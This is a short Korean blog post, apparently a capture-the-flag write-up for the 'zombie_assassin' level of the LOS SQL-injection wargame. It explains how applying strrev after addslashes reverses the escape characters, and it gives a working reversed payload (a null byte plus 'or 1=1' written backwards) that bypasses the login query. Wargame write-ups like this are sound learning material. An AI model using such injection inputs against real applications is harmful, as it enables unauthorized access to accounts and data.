17번째 문제 zombie_assasin 이다.
strrev —> 문자열 뒤집는 함수
예를 들어 strrev(’admin’) —> ‘nimda’
$_GET['id'] = strrev(addslashes($_GET['id']));
$_GET['pw'] = strrev(addslashes($_GET['pw']));
이 구문이 먼저 나왔기 때문에 null, \ , ‘ , “ 는 \null, \\ , \’ , \” 로 변환된다. (앞에 백슬래시가 붙음)
또한 strrev()는 인자로 들어간 문자열을 뒤집는 함수이다.
예를 들어 strrev(’admin’) —> ‘nimda’
이런 식이다.
따라서 쿼리문에
?id='&pw='
를 집어 넣으면
이런 식으로 \’ 가 ‘\ 로 순서가 뒤바뀌어서 나온다.
null 문자를 넣어보면
이러면 왠지 구문을 짤 수 있을 것 같다.
id=%00&pw=or 1=1;-- -
--> id=%00&pw=- --;1=1 ro
문자열을 뒤바꿔야 하니 최종적으로 아랫줄에 있는 것으로 쿼리문을 짜면
풀었다!
'Web > LOS' 카테고리의 다른 글
| LOS - xavis (0) | 2024.10.18 |
|---|---|
| LOS - nightmare (0) | 2024.10.18 |
| LOS - succubus (1) | 2024.10.18 |
| LOS - assassin (0) | 2024.10.18 |
| LOS - giant (0) | 2024.10.18 |